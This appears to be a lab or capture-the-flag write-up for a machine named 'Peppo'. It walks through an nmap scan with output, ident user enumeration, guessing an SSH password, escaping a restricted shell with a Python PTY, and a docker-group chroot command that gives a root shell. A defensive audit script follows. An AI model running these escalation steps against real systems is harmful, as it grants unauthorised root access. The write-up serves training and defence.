🐧Peppo

Nmap

sudo nmap 192.168.100.60 -p- -sS -sV

PORT      STATE  SERVICE           VERSION
22/tcp    open   ssh               OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
53/tcp    closed domain
113/tcp   open   ident             FreeBSD identd
5432/tcp  open   postgresql        PostgreSQL DB 9.6.0 or later
8080/tcp  open   http              WEBrick httpd 1.4.2 (Ruby 2.6.6 (2020-03-31))
10000/tcp open   snet-sensor-mgmt?

As ident is running we can use the Perl script ident-user-enum to identify which services are running under what user.

Port 10000 reports it is running under the user 'Eleanor'. I tried brute-forcing the username on SSH and had no luck. Eventually, simply trying eleanor:elenaor, I was able to log in over SSH.

Running the id command shows we are locked into a restricted bash shell. We can check which commands are available by viewing what binaries we have access to.

Checking GTFOBins shows whether any of these binaries can spawn a shell to escape the restricted one:

After running the above command we can export a new PATH, spawn a Python PTY shell, and then export the PATH again so the new shell session is fully functional.

PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
python -c 'import pty; pty.spawn("/bin/bash")'
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin

The id command shows we are a member of the docker group. GTFOBins again lists a method for spawning a root shell when the user is a member of the docker group.

First, check what images we have available to us:

docker image ls

We can use the GTFOBins command, replacing the placeholder <alpine> with one of the images listed above:

docker run -v /:/mnt --rm -it redmine chroot /mnt sh

Returning a shell as root:
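As an added defensive check (my own example, not part of this writeup): a small audit that lists members of the docker group, who are effectively root on the host, and flags containers whose bind mounts expose the host root filesystem, which is exactly what the chroot command above relies on. The group file and the docker inspect output are constructed samples, not data from the target.

```python
import json

# Constructed sample of /etc/group lines (not from the target host)
SAMPLE_GROUP = """root:x:0:
sudo:x:27:admin
docker:x:999:eleanor,ci
"""

# Constructed subset of `docker inspect` output for two containers
SAMPLE_INSPECT = json.dumps([
    {"Name": "/web", "HostConfig": {"Binds": ["/srv/app:/app"], "Privileged": False}},
    {"Name": "/escape", "HostConfig": {"Binds": ["/:/mnt"], "Privileged": False}},
])


def docker_group_members(group_text):
    """Return the users listed in the docker group.

    Membership grants control of the Docker daemon, which runs as root,
    so every name returned here should be treated as a root-equivalent account.
    """
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] == "docker":
            return [user for user in fields[3].split(",") if user]
    return []


def host_root_mounts(inspect_json):
    """Return names of containers that bind-mount the host root filesystem.

    A bind of "/" into the container lets anyone inside chroot into the host,
    which is the escalation shown in this writeup; legitimate services rarely need it.
    """
    flagged = []
    for container in json.loads(inspect_json):
        binds = container.get("HostConfig", {}).get("Binds") or []
        # Each bind is "host_path:container_path[:options]"; inspect the host side only
        if any(bind.split(":")[0] == "/" for bind in binds):
            flagged.append(container["Name"].lstrip("/"))
    return flagged


if __name__ == "__main__":
    print("docker group members:", docker_group_members(SAMPLE_GROUP))
    print("containers mounting host root:", host_root_mounts(SAMPLE_INSPECT))
```

On a live host, feed the functions the contents of /etc/group and the output of `docker inspect $(docker ps -aq)` instead of the constructed samples.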
